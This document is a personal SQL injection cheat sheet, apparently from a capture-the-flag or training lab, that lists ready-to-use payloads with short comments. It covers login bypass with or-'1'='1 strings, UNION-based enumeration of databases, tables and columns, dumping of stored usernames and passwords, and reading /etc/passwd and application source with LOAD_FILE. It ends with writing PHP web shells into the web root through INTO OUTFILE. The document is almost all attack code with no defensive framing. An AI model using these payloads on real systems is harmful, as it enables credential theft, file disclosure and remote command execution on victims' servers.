SQL Injection

# Username
# It the db have a admin user
admin' or '1'='1

# Username
# If the db doesn't have admin user
notAdmin' or '1'='1
# Password
123' or '1'='1

# If the query is in parenthesis
# Like SELECT * FROM logins where (username='admin')
admin')--

# It will login as superadmin since the id is 5
# It will work if the where condition is in parethensis
# WHERE (username='' OR id = 5)-- -' AND id > 1)
' OR id = 5)-- -

') OR id = '5';-- -

# When using union the right side table should be equal to number of columns from left side table
# So we added 4 numbers
select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;
cn' UNION select 1,2,3,4-- -

# It means that the column 1 is not being displayed to the page
# So we just insert the payload in column 2 spot
cn' UNION select 1,@@version,3,4-- -
' UNION select 1,user(),3,4-- -

# This is the same as UNION select
# Until it will return no column 5 it means that the table only have 4 column
' order by 2-- -
' order by 3-- -
' order by 4-- -

# This will display the database names
# Schemata contains all the information about the databases
# Using the information_schema > schemata
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -

# This will determine which database does the web app uses
cn' UNION select 1,database(),2,3-- -

# This will display the table names
# Using the information_schema > table
# Just specify the database name like dev
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -

# This will display the column names from table credentials
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -

# This will display the data of columns
cn' UNION select 1, username, password, 4 from dev.credentials-- -

# This will display the current database user
cn' UNION SELECT 1, user(), 3, 4-- -

cn' UNION SELECT 1, user, 3, 4 from mysql.user-- -

# This will display the super privilege of the current database user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -

# If the database a lot of users
# This will display the privilege of the specific user
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -

# Y means Yes
# Indiciating super privilege

# Dump all of the privilege
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -

# This will display all of the information about the privilege of the current db user
# Like the UPDATE, SELECT, INSERT, DELETE, ETC
cn' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -

# Display the file /etc/passwd
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -

# Display the file /var/www/html/search.php
# Then just ctrl+u to see the code written in search.php
cn' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -

# If it is an empty value means that we can read files anywhere in the system
# But if the value is NULL we can't do anything in the system
# We can read files if the user have a FILE privilege
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

# This will create a file into db
cn' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -

# Writing a web shell into db
# /shell.php?0=id
# /shell.php?0=cat ../flag.txt
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -

cn' union select "",'<?php system($_REQUEST[cmd]); ?>', "", "", "" into outfile '/var/www/html/dashboard/shell.php'-- -